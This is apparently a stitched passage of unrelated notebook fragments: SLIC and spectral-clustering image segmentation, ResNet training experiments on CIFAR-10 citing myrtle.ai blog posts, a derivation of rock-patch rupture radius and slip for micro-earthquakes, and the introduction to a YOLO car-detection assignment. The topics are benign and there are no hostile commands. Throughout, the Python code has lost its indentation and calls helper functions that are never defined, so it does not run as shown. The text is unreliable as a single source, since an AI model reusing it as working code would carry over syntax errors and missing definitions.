'''
#Make a rough copy
centroids_c = self.centroids_c
centroids_i = self.centroids_i
#Find mean for every cluster
for i in range(self.n_clusters):
if len(cluster_int[i]) > 0:
centroids_i[i] = np.mean(cluster_int[i])
centroids_c[i] = np.mean(cluster_loc[i], axis=0)
#Update fair copy
self.centroids_i = centroids_i
self.centroids_c = centroids_c
if __name__ == '__main__':
img = Image.open('f1.png')
plt.figure(figsize=(10, 20))
plt.subplot(121).imshow(img)
plt.axis('off')
img = np.array(img)
print(f'img.shape: {img.shape}')
X = []
intensities = []
for i in range(img.shape[0]):
for j in range(img.shape[1]):
X.append([i, j])
intensities.append(np.average(img[i][j]))
X = np.array(X)
intensities = np.array(intensities)
k = 25
slic = SLIC()
labels = slic.runSlic(X, intensities, k, 20, 0.25)
visualize_clusters(img, labels, k, 122)
# plot_segmented_image(img, labels, k)
plt.show()
```
# Ratio Cut
```
import numpy as np
from google.colab.patches import cv2_imshow
from PIL import Image
from numpy import linalg as la
import scipy.cluster.vq as vq
import matplotlib.pyplot as plt
import warnings
import math
warnings.simplefilter('ignore')
class Spectralclustering:
def run(self, img, k, LOAD=True, lmbda=0.25, sigma=1):
if not LOAD:
print('Constructing Laplacian matrix...')
L = self.construct_L(img, lmbda, sigma)
print('Performing Eigen Value Decomposition of L...')
l, V = la.eigh( L )
with open('array.npy', 'wb') as fp:
np.save(fp, V, allow_pickle=True)
else:
V = np.load('array.npy')
# First K columns of V need to be clustered
H = V[:,0:k]
if( k==2 ):
# In this case clustering on the Fiedler vector which gives very close approximation
f = H[:,1]
labels = np.ravel( np.sign( f ) )
k=2
else:
# Run K-Means on eigenvector matrix
centroids, labels = vq.kmeans2( H[:,:k], k )
print(f'kmeans2 labels: {labels}')
return labels
def construct_L(self, img: np.ndarray, lmbda: int, sigma: int):
try:
h, w = img.shape[:2]
except AttributeError:
raise TypeError('img should be a numpy array.')
L = np.zeros((h*w, h*w))
D = np.zeros((h*w,))
for i in range(h):
for j in range(w):
# i - 1, j - 1
if i - 1 >= 0 and j - 1 >= 0:
L[(i - 1) * w + (j - 1)][i * w + j] = L[i * w + j][(i - 1) * w + (j - 1)] = -self.sim(img[i][j], i, j, img[i-1][j-1], i-1, j-1, lmbda, sigma)
D[i * w + j] += 1
D[(i - 1) * w + (j - 1)] += 1
# i - 1, j
if i - 1 >= 0:
L[(i - 1) * w + j][i * w + j] = L[i * w + j][(i - 1) * w + j] = -self.sim(img[i][j], i, j, img[i-1][j], i-1, j, lmbda, sigma)
D[(i - 1) * w + j] += 1
D[i * w + j] += 1
# i - 1, j + 1
if i - 1 >= 0 and j + 1 < w:
L[(i - 1) * w + (j + 1)][i * w + j] = L[i * w + j][(i - 1) * w + (j + 1)] = -self.sim(img[i][j], i, j, img[i-1][j+1], i-1, j+1, lmbda, sigma)
D[(i - 1) * w + (j + 1)] += 1
D[i * w + j] += 1
# i, j - 1
if j - 1 >= 0:
L[i * w + (j - 1)][i * w + j] = L[i * w + j][i * w + (j - 1)] = -self.sim(img[i][j], i, j, img[i][j-1], i, j-1, lmbda, sigma)
D[i * w + (j - 1)] += 1
D[i * w + j] += 1
for i in range(h):
for j in range(w):
L[i * w + j][i * w + j] = D[i * w + j]
return L
def sim(self, x1, i1, j1, x2, i2, j2, lmbda = 0.25, sigma = 1):
dist = np.linalg.norm([x1 - x2]) + lmbda * np.linalg.norm([i1 - i2, j1 - j2])
return math.exp(-(dist/sigma**2))
if __name__ == '__main__':
img = Image.open('/content/f1.png')
k = 10
LOAD = False
# --------------------------------------
# CODE TO RESIZE ARRAY TO LOWER SIZE
# ORIGINAL IMAGE WAS EXCEEDING MEMORY
# --------------------------------------
basewidth = 100
wpercent = (basewidth/float(img.size[0]))
hsize = int((float(img.size[1])*float(wpercent)))
img = img.resize((basewidth,hsize), Image.LANCZOS)  # ANTIALIAS was removed in Pillow 10; LANCZOS is its replacement
# Convert image to grayscale
gray = img.convert('L')
# Normalise image intensities to [0,1] values
gray = np.asarray(gray).astype(float)/255.0
# gray = np.array([[0, 1, 0], [1,0,1], [0,1,0]], dtype=float)
s = Spectralclustering()
labels = s.run(gray, k, LOAD=LOAD, lmbda=0.25, sigma=1)
# labels = labels.reshape( gray.shape )
# plot_segmented_image( img, labels, k, None, 'Spectral Clustering' )
img = np.array(img)
plt.figure(figsize=(10, 30))
plt.subplot(131).imshow(img)
plt.axis('off')
visualize_clusters(img, labels, k,132)
plot_segmented_image(img, labels, k, 133)
plt.show()
```
### Library Function
```
# import kmeans
import numpy as np
from google.colab.patches import cv2_imshow
from PIL import Image
from numpy import linalg as la
import scipy.cluster.vq as vq
import matplotlib.pyplot as plt
import warnings
import math
import logging
from sklearn.cluster import SpectralClustering
warnings.simplefilter('ignore')
def sim(x1, i1, j1, x2, i2, j2, lmbda = 0.25, sigma = 1):
dist = np.linalg.norm([x1 - x2]) + lmbda * np.linalg.norm([i1 - i2, j1 - j2])
return math.exp(-(dist/sigma**2))
def construct_W(img: np.ndarray, lmbda: float, sigma: float):
try:
h, w = img.shape[:2]
except AttributeError:
raise TypeError('img should be a numpy array.')
L = np.zeros((h*w, h*w))
D = np.zeros((h*w,))
for i in range(h):
for j in range(w):
# i - 1, j - 1
if i - 1 >= 0 and j - 1 >= 0:
L[(i - 1) * w + (j - 1)][i * w + j] = L[i * w + j][(i - 1) * w + (j - 1)] = sim(img[i][j], i, j, img[i-1][j-1], i-1, j-1, lmbda, sigma)
# i - 1, j
if i - 1 >= 0:
L[(i - 1) * w + j][i * w + j] = L[i * w + j][(i - 1) * w + j] = sim(img[i][j], i, j, img[i-1][j], i-1, j, lmbda, sigma)
# i - 1, j + 1
if i - 1 >= 0 and j + 1 < w:
L[(i - 1) * w + (j + 1)][i * w + j] = L[i * w + j][(i - 1) * w + (j + 1)] = sim(img[i][j], i, j, img[i-1][j+1], i-1, j+1, lmbda, sigma)
# i, j - 1
if j - 1 >= 0:
L[i * w + (j - 1)][i * w + j] = L[i * w + j][i * w + (j - 1)] = sim(img[i][j], i, j, img[i][j-1], i, j-1, lmbda, sigma)
return L
def visualize_clusters_r(image, labels, n_clusters, subp):
# convert to the shape of a vector of pixel values
masked_image = np.copy(image)
labels = labels.flatten()
masked_image = masked_image.reshape(-1)
for i in range(n_clusters):
# color (i.e cluster) to disable
cluster = i
masked_image[labels == cluster] = 255-20*i
# convert back to original shape
masked_image = masked_image.reshape(image.shape)
# show the image
plt.subplot(subp).imshow(masked_image)
plt.axis('off')
if __name__ == '__main__':
img = Image.open('/content/f1.png')
k = 5
# --------------------------------------
# CODE TO RESIZE ARRAY TO LOWER SIZE
# ORIGINAL IMAGE WAS EXCEEDING MEMORY
# --------------------------------------
basewidth = 100
wpercent = (basewidth/float(img.size[0]))
hsize = int((float(img.size[1])*float(wpercent)))
img = img.resize((basewidth,hsize), Image.LANCZOS)  # ANTIALIAS was removed in Pillow 10; LANCZOS is its replacement
plt.figure(figsize=(10, 30))
plt.subplot(131).imshow(img)
plt.axis('off')
# Convert image to grayscale
img = img.convert('L')
# Normalise image intensities to [0,1] values
img = np.asarray(img).astype(float)/255.0
# img = np.array([[0, 1, 0], [1,0,1], [0,1,0]], dtype=float)
logging.debug(f'img:{img}\nimg.shape: {img.shape}')
W = construct_W(img, 0, 1)
sc = SpectralClustering(k, affinity='precomputed', n_init=10,
assign_labels='kmeans')
labels = sc.fit_predict(W)
visualize_clusters_r(img, labels, k, 132)
plot_segmented_image( img, labels, k, 133)
plt.show()
```
```
!sudo nvidia-persistenced
!sudo nvidia-smi -ac 877,1530
from IPython.display import display, HTML  # IPython.core.display is deprecated in favor of IPython.display
display(HTML("<style>.container {width:95% !important;}</style>"))
from core import *
from torch_backend import *
colors = ColorMap()
draw = lambda graph: display(DotGraph({p: ({'fillcolor': colors[type(v)], 'tooltip': repr(v)}, inputs) for p, (v, inputs) in graph.items() if v is not None}))
```
### Network definitions
```
batch_norm = partial(BatchNorm, weight_init=None, bias_init=None)
def res_block(c_in, c_out, stride, **kw):
block = {
'bn1': batch_norm(c_in, **kw),
'relu1': nn.ReLU(True),
'branch': {
'conv1': nn.Conv2d(c_in, c_out, kernel_size=3, stride=stride, padding=1, bias=False),
'bn2': batch_norm(c_out, **kw),
'relu2': nn.ReLU(True),
'conv2': nn.Conv2d(c_out, c_out, kernel_size=3, stride=1, padding=1, bias=False),
}
}
projection = (stride != 1) or (c_in != c_out)
if projection:
block['conv3'] = (nn.Conv2d(c_in, c_out, kernel_size=1, stride=stride, padding=0, bias=False), ['relu1'])
block['add'] = (Add(), [('conv3' if projection else 'relu1'), 'branch/conv2'])
return block
def DAWN_net(c=64, block=res_block, prep_bn_relu=False, concat_pool=True, **kw):
if isinstance(c, int):
c = [c, 2*c, 4*c, 4*c]
classifier_pool = {
'in': Identity(),
'maxpool': nn.MaxPool2d(4),
'avgpool': (nn.AvgPool2d(4), ['in']),
'concat': (Concat(), ['maxpool', 'avgpool']),
} if concat_pool else {'pool': nn.MaxPool2d(4)}
return {
'input': (None, []),
'prep': union({'conv': nn.Conv2d(3, c[0], kernel_size=3, stride=1, padding=1, bias=False)},
{'bn': batch_norm(c[0], **kw), 'relu': nn.ReLU(True)} if prep_bn_relu else {}),
'layer1': {
'block0': block(c[0], c[0], 1, **kw),
'block1': block(c[0], c[0], 1, **kw),
},
'layer2': {
'block0': block(c[0], c[1], 2, **kw),
'block1': block(c[1], c[1], 1, **kw),
},
'layer3': {
'block0': block(c[1], c[2], 2, **kw),
'block1': block(c[2], c[2], 1, **kw),
},
'layer4': {
'block0': block(c[2], c[3], 2, **kw),
'block1': block(c[3], c[3], 1, **kw),
},
'final': union(classifier_pool, {
'flatten': Flatten(),
'linear': nn.Linear(2*c[3] if concat_pool else c[3], 10, bias=True),
}),
'logits': Identity(),
}
def conv_bn(c_in, c_out, bn_weight_init=1.0, **kw):
return {
'conv': nn.Conv2d(c_in, c_out, kernel_size=3, stride=1, padding=1, bias=False),
'bn': batch_norm(c_out, bn_weight_init=bn_weight_init, **kw),
'relu': nn.ReLU(True)
}
def basic_net(channels, weight, pool, **kw):
return {
'input': (None, []),
'prep': conv_bn(3, channels['prep'], **kw),
'layer1': dict(conv_bn(channels['prep'], channels['layer1'], **kw), pool=pool),
'layer2': dict(conv_bn(channels['layer1'], channels['layer2'], **kw), pool=pool),
'layer3': dict(conv_bn(channels['layer2'], channels['layer3'], **kw), pool=pool),
'pool': nn.MaxPool2d(4),
'flatten': Flatten(),
'linear': nn.Linear(channels['layer3'], 10, bias=False),
'logits': Mul(weight),
}
def net(channels=None, weight=0.125, pool=nn.MaxPool2d(2), extra_layers=(), res_layers=('layer1', 'layer3'), **kw):
channels = channels or {'prep': 64, 'layer1': 128, 'layer2': 256, 'layer3': 512}
residual = lambda c, **kw: {'in': Identity(), 'res1': conv_bn(c, c, **kw), 'res2': conv_bn(c, c, **kw),
'add': (Add(), ['in', 'res2/relu'])}
n = basic_net(channels, weight, pool, **kw)
for layer in res_layers:
n[layer]['residual'] = residual(channels[layer], **kw)
for layer in extra_layers:
n[layer]['extra'] = conv_bn(channels[layer], channels[layer], **kw)
return n
remove_identity_nodes = lambda net: remove_by_type(net, Identity)
```
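The `union` helper imported from `torch_backend`/`core` is used above to merge layer dicts (e.g. in `prep` and `final`). A plausible one-line sketch, assuming it is a plain left-to-right dict merge:

```python
def union(*dicts):
    # Merge dicts left-to-right; later keys override earlier ones,
    # matching how 'prep' and 'final' are assembled above.
    return {k: v for d in dicts for k, v in d.items()}

merged = union({'conv': 'c'}, {'bn': 'b', 'relu': 'r'})
```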
### Download and preprocess data
```
DATA_DIR = './data'
dataset = cifar10(DATA_DIR)
timer = Timer()
print('Preprocessing training data')
transforms = [
partial(normalise, mean=np.array(cifar10_mean, dtype=np.float32), std=np.array(cifar10_std, dtype=np.float32)),
partial(transpose, source='NHWC', target='NCHW'),
]
train_set = list(zip(*preprocess(dataset['train'], [partial(pad, border=4)] + transforms).values()))
print(f'Finished in {timer():.2} seconds')
print('Preprocessing test data')
test_set = list(zip(*preprocess(dataset['valid'], transforms).values()))
print(f'Finished in {timer():.2} seconds')
```
### Training loop
```
def train(model, lr_schedule, train_set, test_set, batch_size, num_workers=0):
train_batches = DataLoader(train_set, batch_size, shuffle=True, set_random_choices=True, num_workers=num_workers)
test_batches = DataLoader(test_set, batch_size, shuffle=False, num_workers=num_workers)
lr = lambda step: lr_schedule(step/len(train_batches))/batch_size
opts = [SGD(trainable_params(model).values(), {'lr': lr, 'weight_decay': Const(5e-4*batch_size), 'momentum': Const(0.9)})]
logs, state = Table(), {MODEL: model, LOSS: x_ent_loss, OPTS: opts}
for epoch in range(lr_schedule.knots[-1]):
logs.append(union({'epoch': epoch+1, 'lr': lr_schedule(epoch+1)},
train_epoch(state, Timer(torch.cuda.synchronize), train_batches, test_batches)))
return logs
```
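`PiecewiseLinear` comes from the repo's `core` module and is not shown here; its use in `train` (called with a fractional epoch, `.knots` attribute read for the epoch count) suggests it linearly interpolates between `(knot, value)` pairs. A minimal sketch under that assumption, using `np.interp`:

```python
import numpy as np

class PiecewiseLinear:
    """Linearly interpolate between values at the given knots (epochs)."""
    def __init__(self, knots, vals):
        self.knots, self.vals = knots, vals

    def __call__(self, t):
        return np.interp(t, self.knots, self.vals)

# The Post-1 schedule: ramp to 0.1 by epoch 15, decay to 0.005 by 30, then 0.
lr_schedule = PiecewiseLinear([0, 15, 30, 35], [0, 0.1, 0.005, 0])
```

Note that `train` divides the schedule by `batch_size`, which suggests the loss is summed rather than averaged over the batch.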
### [Post 1: Baseline](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_1/) - DAWNbench baseline + no initial bn-relu + efficient dataloading/augmentation, 1 dataloader process (301s)
```
lr_schedule = PiecewiseLinear([0, 15, 30, 35], [0, 0.1, 0.005, 0])
batch_size = 128
n = DAWN_net()
draw(build_graph(n))
model = Network(n).to(device)
#convert all children including batch norms to half precision (triggering slow codepath!)
for v in model.children():
v.half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR()])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=1)
```
### [Post 1: Baseline](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_1/) - 0 dataloader processes (297s)
```
lr_schedule = PiecewiseLinear([0, 15, 30, 35], [0, 0.1, 0.005, 0])
batch_size = 128
n = DAWN_net()
draw(build_graph(n))
model = Network(n).to(device)
#convert all children including batch norms to half precision (triggering slow codepath!)
for v in model.children():
v.half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR()])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 2: Mini-batches](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_2/) - batch size=512 (256s)
```
lr_schedule = PiecewiseLinear([0, 15, 30, 35], [0, 0.44, 0.005, 0])
batch_size = 512
n = DAWN_net()
draw(build_graph(n))
model = Network(n).to(device)
#convert all children including batch norms to half precision (triggering slow codepath!)
for v in model.children():
v.half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR()])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 3: Regularisation](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_3/) - speed up batch norms (186s)
```
lr_schedule = PiecewiseLinear([0, 15, 30, 35], [0, 0.44, 0.005, 0])
batch_size = 512
n = DAWN_net()
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR()])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 3: Regularisation](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_3/) - cutout+30 epochs+batch_size=512 (161s)
```
lr_schedule = PiecewiseLinear([0, 8, 30], [0, 0.4, 0])
batch_size = 512
n = DAWN_net()
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 3: Regularisation](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_3/) - batch_size=768 (154s)
```
lr_schedule = PiecewiseLinear([0, 8, 30], [0, 0.6, 0])
batch_size = 768
n = DAWN_net()
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone (36s; test acc 55.9%)
It seems reasonable to study how the shortest path through the network trains in isolation and to take steps to improve this before adding back the longer branches.
Eliminating the long branches yields the following backbone network in which all convolutions, except for the initial one, have a stride of two.
Training the shortest path network for 20 epochs yields an unimpressive test accuracy of 55.9% in 36 seconds.
```
def shortcut_block(c_in, c_out, stride, **kw):
block = {
'bn1': batch_norm(c_in, **kw),
'relu1': nn.ReLU(True),
}
projection = (stride != 1) or (c_in != c_out)
if projection:
block['conv3'] = (nn.Conv2d(c_in, c_out, kernel_size=1, stride=stride, padding=0, bias=False), ['relu1'])
return block
lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])
batch_size = 512
n = DAWN_net(block=shortcut_block)
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone, remove repeat bn-relu (32s; test acc 56.0%)
Removing the repeated batch norm-ReLU groups reduces training time to 32s and leaves test accuracy approximately unchanged.
```
def shortcut_block(c_in, c_out, stride, **kw):
projection = (stride != 1) or (c_in != c_out)
if projection:
return {
'conv': nn.Conv2d(c_in, c_out, kernel_size=1, stride=stride, padding=0, bias=False),
'bn': batch_norm(c_out, **kw),
'relu': nn.ReLU(True),
}
else:
return {'id': Identity()}
lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])
batch_size = 512
n = DAWN_net(block=shortcut_block, prep_bn_relu=True)
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone, 3x3 convs (36s; test acc 85.6%)
A serious shortcoming of this network is that the downsampling convolutions have 1x1 kernels and a stride of two, so that rather than enlarging the receptive field they are simply discarding information.
If we replace these with 3x3 convolutions, things improve considerably and test accuracy after 20 epochs is 85.6% in a time of 36s.
```
def shortcut_block(c_in, c_out, stride, **kw):
projection = (stride != 1) or (c_in != c_out)
if projection:
return {
'conv': nn.Conv2d(c_in, c_out, kernel_size=3, stride=stride, padding=1, bias=False),
'bn': batch_norm(c_out, **kw),
'relu': nn.ReLU(True),
}
else:
return {'id': Identity()}
lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])
batch_size = 512
n = DAWN_net(block=shortcut_block, prep_bn_relu=True)
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone, maxpool downsampling (43s; test acc 89.7%)
We can further improve the downsampling stages by applying 3x3 convolutions of stride one followed by a pooling layer instead of using strided convolutions.
We choose max pooling with a 2x2 window size leading to a final test accuracy of 89.7% after 43s. Using average pooling gives a similar result but takes slightly longer.
```
def shortcut_block(c_in, c_out, stride, **kw):
projection = (stride != 1) or (c_in != c_out)
if projection:
return {
'conv': nn.Conv2d(c_in, c_out, kernel_size=3, stride=1, padding=1, bias=False),
'bn': batch_norm(c_out, **kw),
'relu': nn.ReLU(True),
'pool': nn.MaxPool2d(2),
}
else:
return {'id': Identity()}
lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])
batch_size = 512
n = DAWN_net(block=shortcut_block, prep_bn_relu=True)
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone, 2x output dim, global maxpool (47s; test acc 90.7%)
The final pooling layer before the classifier is a concatenation of global average pooling and max pooling layers, inherited from the original network.
We replace this with a more standard global max pooling layer and double the output dimension of the final convolution to compensate for the reduction in input dimension to the classifier, leading to a final test accuracy of 90.7% in 47s. Note that average pooling at this stage underperforms max pooling significantly.
```
def shortcut_block(c_in, c_out, stride, **kw):
projection = (stride != 1) or (c_in != c_out)
if projection:
return {
'conv': nn.Conv2d(c_in, c_out, kernel_size=3, stride=1, padding=1, bias=False),
'bn': batch_norm(c_out, **kw),
'relu': nn.ReLU(True),
'pool': nn.MaxPool2d(2),
}
else:
return {'id': Identity()}
lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])
batch_size = 512
n = DAWN_net(c=[64,128,256,512], block=shortcut_block, prep_bn_relu=True, concat_pool=False)
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone, bn scale init=1, classifier weight=0.125 (47s; test acc 91.1%)
By default in PyTorch (0.4), initial batch norm scales are chosen uniformly at random from the interval [0,1]. Channels which are initialised near zero could be wasted so we replace this with a constant initialisation at 1.
This leads to a larger signal through the network and to compensate we introduce an overall constant multiplicative rescaling of the final classifier. A rough manual optimisation of this extra hyperparameter suggests that 0.125 is a reasonable value.
(The low value makes predictions less certain and appears to ease optimisation.)
With these changes in place, 20 epoch training reaches a test accuracy of 91.1% in 47s.
```
lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])
batch_size = 512
n = net(extra_layers=(), res_layers=())
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - double width, 60 epoch train! (321s; test acc 93.5%)
One approach that doesn't seem particularly promising is simply to add width.
If we double the channel dimensions and train for 60 epochs we can reach 93.5% test accuracy with a 5 layer network. This is nice but not efficient since training now takes 321s.
```
lr_schedule = PiecewiseLinear([0, 12, 60], [0, 0.4, 0])
batch_size = 512
c = 128
n = net(channels={'prep': c, 'layer1': 2*c, 'layer2': 4*c, 'layer3': 8*c}, extra_layers=(), res_layers=())
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - extra:L1+L2+L3 network, 60 epochs, cutout=12 (180s, 95.0% test acc)
```
lr_schedule = PiecewiseLinear([0, 12, 60], [0, 0.4, 0])
batch_size = 512
cutout=12
n = net(extra_layers=['layer1', 'layer2', 'layer3'], res_layers=())
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(cutout, cutout)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - final network Residual:L1+L3, 20 epochs (66s; test acc 93.7%)
```
lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])
batch_size = 512
n = net()
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - final network, 24 epochs (79s; test acc 94.1%)
```
lr_schedule = PiecewiseLinear([0, 5, 24], [0, 0.4, 0])
batch_size = 512
n = net()
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
# Radius and mean slip of rock patches failing in micro-seismic events
When stresses in a rock surpass its shear strength, the affected rock volume fails by shearing.
Assume that we observe a circular patch with radius $r$ on, e.g., a fault, and that this patch is affected by a slip with an average slip distance $d$.
This slip is a response to increasing shear stresses, hence it reduces shear stresses by $\Delta \tau$.
These three parameters are linked by:
$$\Delta \tau = \frac{7 \, \pi \, \mu}{16 \, r} \, d $$
where $\mu$ is the shear modulus near the fault.
The seismic moment $M_0$, the energy to offset an area $A$ by a distance $d$, is defined by:
$$M_0 = \mu \, d \, A$$
$$ d = \frac{M_0}{\mu \, A} $$
with $A = \pi r^2$.
The [USGS definition](https://earthquake.usgs.gov/learn/glossary/?term=seismic%20moment) for the seismic moments is: *The seismic moment is a measure of the size of an earthquake based on the area of fault rupture, the average amount of slip, and the force that was required to overcome the friction sticking the rocks together that were offset by faulting. Seismic moment can also be calculated from the amplitude spectra of seismic waves.*
Substituting this expression for $d$ into the first equation and solving for the radius yields:
$$r = \bigg(\frac{7 \, M_0}{16 \, \Delta \tau}\bigg)^{1/3}$$
The following code produces a plot relating the influenced radius $r$ to the average displacement $d$ for micro-earthquakes. It shows that for a small shear stress reduction $\Delta \tau$ a larger area is affected by smaller displacements, while for larger shear stress reductions smaller areas undergo bigger displacements.
```
# import libraries
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
sns.set_style('ticks')
sns.set_context('talk')
def get_displacement(mu, dtau, m0):
r = ((7*m0)/(16*dtau))**(1./3.)
d = m0 / (mu*r**2 * np.pi)
# Alternatively:
# od = np.pi * mu * r * (7/(16*dtau*m0**2))**(1./3.)
# d = 1 / od
return r, d
# Parameters
dtau = np.arange(1,11)*1e6 # shear stress reduction
m0 = np.array([3.2e10, 1.0e12, 3.2e13]) # seismic moment
mu = 2.5e10 # shear modulus
# calculate displacements and radius
displacements = np.concatenate([get_displacement(mu, x, m0) for x in dtau])
# separate radius and displacement arrays
disps = displacements[1::2,:]
rads = displacements[0::2,:]
# min tau and max tau
mitau = np.polyfit(disps[0,:], rads[0,:],1)
matau = np.polyfit(disps[-1,:], rads[-1,:],1)
dsim = np.linspace(0,0.033)
mirad = mitau[0]*dsim+mitau[1]
marad = matau[0]*dsim+matau[1]
# plot results
fig = plt.figure(figsize=[12,7])
plt.plot(disps[:,0]*1000, rads[:,0], '.', label='M$_w$1')
plt.plot(disps[:,1]*1000, rads[:,1], '^', label='M$_w$2')
plt.plot(disps[:,2]*1000, rads[:,2], 's', label='M$_w$3')
plt.plot(dsim*1000, mirad, '-', color='gray', alpha=.5)
plt.plot(dsim*1000, marad, '-', color='gray', alpha=.5)
plt.legend()
plt.ylim([0, 300])
plt.xlim([0, 0.033*1000])
plt.text(.8, 200, r'$\Delta\tau = 1$ MPa', fontsize=14)
plt.text(20, 55, r'$\Delta\tau = 10$ MPa', fontsize=14)
plt.xlabel('average displacement [mm]')
plt.ylabel('influenced radius [m]')
#fig.savefig('displacement_radius.png', dpi=300, bbox_inches='tight')
```
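The hard-coded `m0` values correspond roughly to moment magnitudes $M_w \approx 1, 2, 3$. They are consistent with the Hanks–Kanamori relation $M_0 = 10^{1.5 M_w + c}$ N·m with $c = 9.0$ (the commonly quoted constant is 9.05–9.1; the rounded values above imply 9.0 — an inference, not stated in the notebook):

```python
def moment_from_magnitude(mw, c=9.0):
    """Seismic moment M0 [N*m] from moment magnitude Mw.
    c=9.0 reproduces the rounded m0 values used above; the commonly
    quoted Hanks-Kanamori constant is 9.05-9.1."""
    return 10 ** (1.5 * mw + c)

m0_values = [moment_from_magnitude(mw) for mw in (1, 2, 3)]
```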
# Autonomous driving - Car detection
Welcome to your week 3 programming assignment. You will learn about object detection using the very powerful YOLO model. Many of the ideas in this notebook are described in the two YOLO papers: [Redmon et al., 2016](https://arxiv.org/abs/1506.02640) and [Redmon and Farhadi, 2016](https://arxiv.org/abs/1612.08242).
**You will learn to**:
- Use object detection on a car detection dataset
- Deal with bounding boxes
## <font color='darkblue'>Updates</font>
#### If you were working on the notebook before this update...
* The current notebook is version "3a".
* You can find your original work saved in the notebook with the previous version name ("v3")
* To view the file directory, go to the menu "File->Open", and this will open a new tab that shows the file directory.
#### List of updates
* Clarified "YOLO" instructions preceding the code.
* Added details about anchor boxes.
* Added explanation of how score is calculated.
* `yolo_filter_boxes`: added additional hints. Clarify syntax for argmax and max.
* `iou`: clarify instructions for finding the intersection.
* `iou`: give variable names for all 8 box vertices, for clarity. Adds `width` and `height` variables for clarity.
* `iou`: add test cases to check handling of non-intersecting boxes, intersection at vertices, or intersection at edges.
* `yolo_non_max_suppression`: clarify syntax for tf.image.non_max_suppression and keras.gather.
* "convert output of the model to usable bounding box tensors": Provides a link to the definition of `yolo_head`.
* `predict`: hint on calling sess.run.
* Spelling, grammar, wording and formatting updates to improve clarity.
## Import libraries
